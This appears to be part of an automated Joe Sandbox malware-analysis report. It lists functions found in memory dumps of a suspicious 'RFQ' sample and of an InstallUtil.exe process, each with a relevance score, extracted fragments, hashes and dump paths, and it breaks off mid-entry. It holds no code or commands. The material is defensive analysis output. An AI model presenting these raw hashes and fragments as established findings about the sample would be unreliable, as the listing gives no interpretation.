Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7043e9958ba63634b846be7f2089b964753fa849c61b816c0fa7e63bfe2a37b0
Instruction ID: dece50220068d9d3b19b23d4b53e5f70669b8c19b18cd8426aa98ff19feee6b6
Opcode Fuzzy Hash: 7043e9958ba63634b846be7f2089b964753fa849c61b816c0fa7e63bfe2a37b0
Instruction Fuzzy Hash: 70412CB0D04219DFDB24DF6AD9407EEFBF6AF89300F14C46AD418A7255D77409458F61

Function 0518C644 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2010595252.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5180000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fb5676b9b99f4d292e79206bad2ce0bfa8ad5b9a0216b6a2b02fc370a60ec76
Instruction ID: 5bf19771088f9f62c9cf013f7cf05125098671e9bf14541e744f263abd7d9f48
Opcode Fuzzy Hash: 4fb5676b9b99f4d292e79206bad2ce0bfa8ad5b9a0216b6a2b02fc370a60ec76
Instruction Fuzzy Hash: 2C412770940619CAEB38DF16D85ABB9BBB3BB44308F58C0F6D1199A250DB744E85CFA0

Function 0518C0FC Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2010595252.0000000005180000.00000040.00000800.00020000.00000000.sdmp, Offset: 05180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5180000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5275f0883afbdec744a20238a311fc0c1c7d5e6cc42197ffad680256e1bc525
Instruction ID: bfbec02fbf77c7fa0afffc1fd5b8f38ee99893ca141879d51ca4fbcd1c386413
Opcode Fuzzy Hash: a5275f0883afbdec744a20238a311fc0c1c7d5e6cc42197ffad680256e1bc525
Instruction Fuzzy Hash: 24413870940619CAEB38DF16D85ABB9BBF3BB44308F58C0F6D1199A250DB744E85CFA0

Function 09A20011 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a1e8b07db19df0dc0cd437493f7bfcf3955d2db0f508d0ed55468a0b805297d9
Instruction ID: 65a264576d123b4d5e0f474fe8b606558e96aa59b6ba49ca6a165b2a6f0b57ab
Opcode Fuzzy Hash: a1e8b07db19df0dc0cd437493f7bfcf3955d2db0f508d0ed55468a0b805297d9
Instruction Fuzzy Hash: 71415071E05A588FE71CCF6B8C41299FAF3AFC9300F18C0BAC848AA269DB3505568F55

Function 09A20040 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d680d79123113198be4659f70065c59922fac8bbf92400e177972c2d194938d7
Instruction ID: 57181b6e9196ceae2160e91e254aebe2419026c0ee986cc21a7e8baac16fee34
Opcode Fuzzy Hash: d680d79123113198be4659f70065c59922fac8bbf92400e177972c2d194938d7
Instruction Fuzzy Hash: AD414C71E056188BEB5CCF6B8C4069EFAF3AFC9300F18C1B9840CAA229DB3115928F45

Function 074A5B98 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 628fc9d0d44c8da1d1dd5a175583331493e204fc5760f4dd95501e44d1cabf73
Instruction ID: c64510e1619e5106d86770c83e1b75fa3089000ad250375569ee112531f40100
Opcode Fuzzy Hash: 628fc9d0d44c8da1d1dd5a175583331493e204fc5760f4dd95501e44d1cabf73
Instruction Fuzzy Hash: 8041F8B0E00219DBEB28DFAAD9407EEFBF6EB89300F14D46AD418B7255DB741A458F50

Function 09874490 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7d50abc1394f5896af0425442f559a57ee3c72851d948b8a874b52c1ef776b0
Instruction ID: a11ba312ebcc7df20d8b2a86d0fc321e3bd106f5d6e1e364aeafdf30ec510ceb
Opcode Fuzzy Hash: c7d50abc1394f5896af0425442f559a57ee3c72851d948b8a874b52c1ef776b0
Instruction Fuzzy Hash: 9B31C170E05618CBEB18CFAAD84479EFBF7BB89304F04D4A9D509AB364DB7489858F05

Function 09946CB8 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 674829a0bd612b65c37e599e1cd0833fccf39c88a5bd7fc1605bfd2d5a2cb3a8
Instruction ID: 344bec6102160f9f889d4c24f4c2a1e8ad7ac4cd4f4630710088c8a01e6960cb
Opcode Fuzzy Hash: 674829a0bd612b65c37e599e1cd0833fccf39c88a5bd7fc1605bfd2d5a2cb3a8
Instruction Fuzzy Hash: 9131AEB1D156188BEB5ECF6B8C0169AFAFBAFC9300F04D0FAD448A6254DB7006818F11

Function 09D90019 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2046510988.0000000009D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 09D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9d90000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b4f306c2e1ab2648143cc61d2d6cbf66256503ce90c1314b1a38e20e480f829
Instruction ID: 9b809f975989d3a4823b79da85ffca11ca028f51b84c4b2bd0f5c2df5904cafb
Opcode Fuzzy Hash: 7b4f306c2e1ab2648143cc61d2d6cbf66256503ce90c1314b1a38e20e480f829
Instruction Fuzzy Hash: C8310871D446198BEB29CF2BCC4479ABBF6AFC9304F04C0FAD40CA6625DB700A858F51

Function 074A5131 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0673f9e5046032c3bf5af3428014814cad122670027bc35e9768c66faf516c8e
Instruction ID: b862c45ac1dd751baf4a88522b8090a9fced1a4937c9ef660375413275bec561
Opcode Fuzzy Hash: 0673f9e5046032c3bf5af3428014814cad122670027bc35e9768c66faf516c8e
Instruction Fuzzy Hash: 9E21DDB5D142589FCB14CFA9D984AEEFBF0BB49320F14946AE805B7210C7356945CFA4

Function 09945AE8 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a65470de7ed7e5d9890c37b76b44380c2bc51b214746c8a14a98d901260140dd
Instruction ID: ec3fdcc1da950b67bc6287f56ce64304adfa8311fc1e0f4df4d19ac999846ba8
Opcode Fuzzy Hash: a65470de7ed7e5d9890c37b76b44380c2bc51b214746c8a14a98d901260140dd
Instruction Fuzzy Hash: B121A9B1D056588BDB19CFABCD446DDBBF7AFC9301F14D0AAD809AA214DB350A85CF41

Function 074A5138 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2036711409.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_74a0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7363e4e5fe72b6ace11235d6ef8245af0c2f3421aaacd54b7f8481ca9ee104b
Instruction ID: c43b694cf9ec73609611d670cade57fbd1fa2d03d400056a405ac7f723717cd5
Opcode Fuzzy Hash: e7363e4e5fe72b6ace11235d6ef8245af0c2f3421aaacd54b7f8481ca9ee104b
Instruction Fuzzy Hash: 0521CEB5D042189FCB14DFA9D980AEEFBF4FB49320F14942AE805B7210C735A945CFA4

Function 09A27EE0 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3043d52c94633f143f1ad8acccfb343370a2f947cf9151324304e88ee1978ad6
Instruction ID: b0db3863ab0a8c060e270d8bbe12804fde8b1988d0b26e6f7b9995b9cc452b69
Opcode Fuzzy Hash: 3043d52c94633f143f1ad8acccfb343370a2f947cf9151324304e88ee1978ad6
Instruction Fuzzy Hash: 2521BCB1D05658CBDB18CF6B88452DEFBF7AFC9700F14C0BAD808AA624DB311646CE50

Function 09874481 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2044693538.0000000009870000.00000040.00000800.00020000.00000000.sdmp, Offset: 09870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9870000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d96f4850e0bc1e711c3f5bade81db48fc4e79f8635aec98d7010b1ccbef616bf
Instruction ID: 4bcef7a7c6a6b0f295c6f290b15ab563bcf138f311dbddf9db13f874f39b57b7
Opcode Fuzzy Hash: d96f4850e0bc1e711c3f5bade81db48fc4e79f8635aec98d7010b1ccbef616bf
Instruction Fuzzy Hash: 5F21D8B1E057188BDB18CFAAD84439EFBF7BF89304F14C0A9D408AA364DB7549468F51

Function 09945AD8 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2044885753.0000000009940000.00000040.00000800.00020000.00000000.sdmp, Offset: 09940000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9940000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9f606510ec197cc3bb60072596c031e96238c8211195158c698659eff0f897
Instruction ID: 15eda209318b0e3ad130065e6c87763627ff5d1111bcc2d5ef438979f104987a
Opcode Fuzzy Hash: 7a9f606510ec197cc3bb60072596c031e96238c8211195158c698659eff0f897
Instruction Fuzzy Hash: 1021C771D05A588BDB19CF6B8C446DABBF7AFC9300F04C0BAD809AA224EB311941CE51

Function 07CA0EE8 Relevance: 8.9, Strings: 7, Instructions: 191COMMON

Download Yara Rule

Strings

$^q, xrefs: 07CA1142
$^q, xrefs: 07CA0F83
$^q, xrefs: 07CA0F9F
$^q, xrefs: 07CA0FAB
4'^q, xrefs: 07CA0FC2
$^q, xrefs: 07CA1136
4'^q, xrefs: 07CA0FCE

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-75002515
Opcode ID: 82345af92a3cedc6ed56b82e9ef20dfd6aa3fafc936751a3f7836eba400589ee
Instruction ID: 01e87812dc7c62c3466035d2397f8b6bf4376ee406a9f1498675e93e1f571825
Opcode Fuzzy Hash: 82345af92a3cedc6ed56b82e9ef20dfd6aa3fafc936751a3f7836eba400589ee
Instruction Fuzzy Hash: C3518CB0B4434FAFCB248B2988845A6BBF6BF85256F18847BD145CF215EE31CD85C792

Function 09934E48 Relevance: 7.9, Strings: 6, Instructions: 407COMMON

Download Yara Rule

Strings

4'^q, xrefs: 09934F1A
4'^q, xrefs: 09934EFC
pbq, xrefs: 09934F9F
(bq, xrefs: 09935012
4'^q, xrefs: 09934F92
4'^q, xrefs: 09934ECC

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: 88b94bf79266ae868bfa359ea32e4bc988fcbfcdf5caf7ab509d73b3e539eae1
Instruction ID: c3f234c1d8b9b21652e2dc088610ead2b5c6099744f8dd152d66d22cf4981daf
Opcode Fuzzy Hash: 88b94bf79266ae868bfa359ea32e4bc988fcbfcdf5caf7ab509d73b3e539eae1
Instruction Fuzzy Hash: E2D13D36A00254DFCB05CFA4C944A99BBB3FF89310F068498E609AB276D732ED55DF91

Function 07CA1A90 Relevance: 6.4, Strings: 5, Instructions: 132COMMON

Download Yara Rule

Strings

Te^q, xrefs: 07CA1B26
Te^q, xrefs: 07CA1B65
4'^q, xrefs: 07CA1B95
Te^q, xrefs: 07CA1B71
4'^q, xrefs: 07CA1B89

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$Te^q$Te^q$Te^q
API String ID: 0-3563833378
Opcode ID: 7787c068c3fd3ac2cd4f97034a39a5ebc7718e1107811e3e8ddfed2010d956f1
Instruction ID: 0fc445dc9adfba820ba3d09a9ca0d9ef4ff4f14c88981dd9c660af82f9ba4d33
Opcode Fuzzy Hash: 7787c068c3fd3ac2cd4f97034a39a5ebc7718e1107811e3e8ddfed2010d956f1
Instruction Fuzzy Hash: 93413AF1B0030FAFCB149A79998477ABBF69F85219F18807AD505CB291EF31C946C761

Function 099346D8 Relevance: 5.4, Strings: 4, Instructions: 392COMMON

Download Yara Rule

Strings

(bq, xrefs: 0993470A
Hbq, xrefs: 09934A8B
Hbq, xrefs: 09934A23
(bq, xrefs: 09934735

Memory Dump Source

Source File: 00000003.00000002.2044813173.0000000009930000.00000040.00000800.00020000.00000000.sdmp, Offset: 09930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9930000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: (bq$(bq$Hbq$Hbq
API String ID: 0-2599935029
Opcode ID: 6c6641853ee18ce5f3f79faaaa0306e5ea957c9db5bcbdf56a2c8b5dc2b433af
Instruction ID: 9aa97b13c63118e6d7f255bff2280e97d415fc8c8d92e998c5ae3b1aba81e178
Opcode Fuzzy Hash: 6c6641853ee18ce5f3f79faaaa0306e5ea957c9db5bcbdf56a2c8b5dc2b433af
Instruction Fuzzy Hash: 65E1DE307042559FCB15DF69C480A6EBBA6FF89304F56C5A8E809CB3A5CB34EC46CB91

Function 07CA0990 Relevance: 5.0, Strings: 4, Instructions: 34COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07CA09EF
4'^q, xrefs: 07CA09E3
$^q, xrefs: 07CA09CE
$^q, xrefs: 07CA09C2

Memory Dump Source

Source File: 00000003.00000002.2039183244.0000000007CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ca0000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 1094baa06fa905ad6a9d4ff38d2b1c609e65b50d456b46e471ac5d0f007e0a46
Instruction ID: a6accc8cf444414d883cddc0b6f95fdde4305e3627f151ec35e2c753e27c3e86
Opcode Fuzzy Hash: 1094baa06fa905ad6a9d4ff38d2b1c609e65b50d456b46e471ac5d0f007e0a46
Instruction Fuzzy Hash: A1F097B1B8010B6BAA3C187D1024A2947E39BC0B86720442AC081DF34CEE21DEC68386

Function 09A28768 Relevance: 5.0, Strings: 4, Instructions: 28COMMON

Download Yara Rule

Strings

3, xrefs: 09A287B8
TJcq, xrefs: 09A2878B
), xrefs: 09A287D8
Te^q, xrefs: 09A28768

Memory Dump Source

Source File: 00000003.00000002.2045340125.0000000009A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 09A20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_9a20000_RFQ_43200046412000086500125.jbxd

Similarity

API ID:
String ID: )$3$TJcq$Te^q
API String ID: 0-123536998
Opcode ID: f11b352595e2f904efbaaa121f9d49a272704683e99968473d9340ad5ab225e7
Instruction ID: 14a0c39afea0f61b4264132083791a75233b8d2bb548c0c273b55879fe2248d1
Opcode Fuzzy Hash: f11b352595e2f904efbaaa121f9d49a272704683e99968473d9340ad5ab225e7
Instruction Fuzzy Hash: 37019274A04259DFDB50CF59C994BEDB7B2BB45700F608199D409AB244DB706E85CF44

Analysis Process: InstallUtil.exePID: 8184, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	63
Total number of Limit Nodes:	4

Executed Functions

Function 04CE026F Relevance: 16.1, Strings: 12, Instructions: 1137COMMON

Download Yara Rule

Strings

,bq, xrefs: 04CE0D3A
$^q, xrefs: 04CE0787
$^q, xrefs: 04CE0BAA
$^q, xrefs: 04CE0777
$^q, xrefs: 04CE06D7
$^q, xrefs: 04CE0503
$^q, xrefs: 04CE0BBA
$^q, xrefs: 04CE0B51
$^q, xrefs: 04CE0B61
$^q, xrefs: 04CE06C7
$^q, xrefs: 04CE0513
4, xrefs: 04CE0C55

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-312445597
Opcode ID: 48624c0524b2b7feff993a60740157367179855e613b32c50b24ce7242af0d7a
Instruction ID: 0880c78a4b06640c3d2611d98ac28c54434e710ae0055b3e41e813223091288f
Opcode Fuzzy Hash: 48624c0524b2b7feff993a60740157367179855e613b32c50b24ce7242af0d7a
Instruction Fuzzy Hash: EFB21934A00228CFDB14CFAAC994BADB7B6FB88704F148595E505AB3A5DB70ED45CF90

Function 04CE05A7 Relevance: 8.0, Strings: 6, Instructions: 495COMMON

Download Yara Rule

Strings

,bq, xrefs: 04CE0D3A
$^q, xrefs: 04CE0BAA
$^q, xrefs: 04CE0777
$^q, xrefs: 04CE0B51
$^q, xrefs: 04CE06C7
4, xrefs: 04CE0C55

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: ,bq$4$$^q$$^q$$^q$$^q
API String ID: 0-2546334966
Opcode ID: 91e34c472efe6d1c48968ab53f5929ffc463b21a4b8974d3b2adaee6bcc310a2
Instruction ID: 68e913e411736b8849dc5a23084c1ae7bc1998c4d07aea5ea9a8047a66fbfc2f
Opcode Fuzzy Hash: 91e34c472efe6d1c48968ab53f5929ffc463b21a4b8974d3b2adaee6bcc310a2
Instruction Fuzzy Hash: 4322EB34A00228CFDB14DF66C994BADB7B2FF48304F1485A9D509AB2A5DB71ED86CF50

Function 04CE36A8 Relevance: 4.4, Strings: 3, Instructions: 666COMMON

Download Yara Rule

Strings

Pl^q, xrefs: 04CE3890
$^q, xrefs: 04CE3976
(_^q, xrefs: 04CE3E63

Memory Dump Source

Source File: 00000008.00000002.2076558393.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4ce0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (_^q$Pl^q$$^q
API String ID: 0-912065397
Opcode ID: 99df1d69cc765104b39233121c819140dc328f8d007492bef057b49d71e46707
Instruction ID: fb6c0a4ac9e16fe571ef61e9990b0daac7d53305fca7a125242ec991f3c5941d
Opcode Fuzzy Hash: 99df1d69cc765104b39233121c819140dc328f8d007492bef057b49d71e46707
Instruction Fuzzy Hash: B8422834B002488FCB14DF6AC584A7A77E6AF89710B1584A9E906CB375EB35FD82CB51

Function 04D14879 Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

fcq, xrefs: 04D148C0
UQ, xrefs: 04D149D9

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID: fcq$UQ
API String ID: 0-4237912776
Opcode ID: 4bcdd3e7de9761cb16ebe0c350ac407370353a6bd197455e425d15d14a31fc63
Instruction ID: 84590cd8821789b660b0a7512f90b0bff7840f6632169dd1af37c5e5d666aa60
Opcode Fuzzy Hash: 4bcdd3e7de9761cb16ebe0c350ac407370353a6bd197455e425d15d14a31fc63
Instruction Fuzzy Hash: 4E61F4B4E04108DFDB08DFA9E455BADBBF1FF44304F218069D416AB2A0D779A94ADF11

Function 04D14888 Relevance: 2.6, Strings: 2, Instructions: 139COMMON

Download Yara Rule

Strings

fcq, xrefs: 04D148C0
UQ, xrefs: 04D149D9

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID: fcq$UQ
API String ID: 0-4237912776
Opcode ID: 65b04133cbc831546a3af094fa850da9e41c1f59155a38f7ff7bdf30b7805dcf
Instruction ID: 1d6f1901b6e759219a8d729dea035f3b0ce482930f435990d699137496139819
Opcode Fuzzy Hash: 65b04133cbc831546a3af094fa850da9e41c1f59155a38f7ff7bdf30b7805dcf
Instruction Fuzzy Hash: 9D51B274E05108DFCB08DFA9E455BADB7F1FF88304F118069D416AB2A0DB75A98ADF11

Function 04CF0D50 Relevance: 1.9, Strings: 1, Instructions: 635COMMON

Download Yara Rule

Strings

(bq, xrefs: 04CF0F08

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID: (bq
API String ID: 0-149360118
Opcode ID: 8f73d3e9d5cc0e6a139ad4400c157f3bdd39a537e7b5c5883603769679c912cd
Instruction ID: 29c6f5cf4ca6d94885b81766c67eaf1fe011e86d9561498d7045b3db6be4d707
Opcode Fuzzy Hash: 8f73d3e9d5cc0e6a139ad4400c157f3bdd39a537e7b5c5883603769679c912cd
Instruction Fuzzy Hash: EF326974B006158FCB58DF69C89466EBBF2FF88300F288529E65AD7781DB34AD05CB90

Function 04D19C4E Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

Te^q, xrefs: 04D19D1A

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 77afff33a9efff887f11283c7adefbf35a23df467acbf73446d4f6f6d1ddd720
Instruction ID: 0d139e0c99aaa176c455d3a83a97d1d19a7e5de20def9193671722d58ccc474e
Opcode Fuzzy Hash: 77afff33a9efff887f11283c7adefbf35a23df467acbf73446d4f6f6d1ddd720
Instruction Fuzzy Hash: 9C5181B4744100DFD708DB69E4B9BAA73F3BB84305F2581A5E8068B2B4DB75AC86DB41

Function 04D194C8 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21be4a82e0966654156eeab796138e8dd44d8e67a3ead8bcc6b397320ba843ad
Instruction ID: df26fbc4e63d72faf78478535059905bf5aa9148cb0264df9d310e33a911ebbc
Opcode Fuzzy Hash: 21be4a82e0966654156eeab796138e8dd44d8e67a3ead8bcc6b397320ba843ad
Instruction Fuzzy Hash: 29A1BFB4B04205EFEB04CF59E4B5BE977F2FB85304F1481A4D805AB2A8E775E886DB11

Function 04D194D8 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2077029129.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4d10000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 305a9c82a88554f78f11d24c0e235e652f093b3054ca1a979874cbd4b3349b56
Instruction ID: 59779e04f2812248cfbbc1b0c129bcac201971ecf0db4fa663ec2804264e4dde
Opcode Fuzzy Hash: 305a9c82a88554f78f11d24c0e235e652f093b3054ca1a979874cbd4b3349b56
Instruction Fuzzy Hash: 27A1AFB8B04105EFEB04CF59E4B4BA977F2FB85304F5481A0D805AB2B8E775E986DB10

Function 04BB2B49 Relevance: .2, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c92d42389eb962f8c72a71b472de8b40871f746a70706b383bdae6ea56724fb4
Instruction ID: 18f52da12fef0a4721179ba3eef9acc70f39cdb0e5c0e3f65d06c725fe4714cf
Opcode Fuzzy Hash: c92d42389eb962f8c72a71b472de8b40871f746a70706b383bdae6ea56724fb4
Instruction Fuzzy Hash: 6451E734B0464287EB5E2A7998A827F65A7CFD4700F0545FE8B82873C5DEACBC0672D5

Function 04BB2B68 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2074829583.0000000004BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4bb0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e1aa59474c465764e9dc4cf302e9396126595aca9fd85da76be4ded3133096
Instruction ID: 5fd6c190972b8cc066c1167340eb78d40741985247af1210c4eff0e7b4e26a36
Opcode Fuzzy Hash: c1e1aa59474c465764e9dc4cf302e9396126595aca9fd85da76be4ded3133096
Instruction Fuzzy Hash: 1151AE35B0060287EB5E2A7A98A837F609BCFD4700F1485BD8B42873C5DEADBC0662D5

Function 04CF6610 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2076718141.0000000004CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4cf0000_InstallUtil.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6795de7131199ecc27ec1911634b65f04dc85bf90c63b43049d2ddb1548ed006
Instruction ID: dfd3a6eeb86f95a6028dbec4f07d6df29e186676704081b383d08a43f72bf6ef
Opcode Fuzzy Hash: 6795de7131199ecc27ec1911634b65f04dc85bf90c63b43049d2ddb1548ed006
Instruction Fuzzy Hash: 1B61AF387441008FD758DF6AC955B6A77E3EB88304F258069E6018B7B9DB79EC87DB80

Function 04CF6601 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

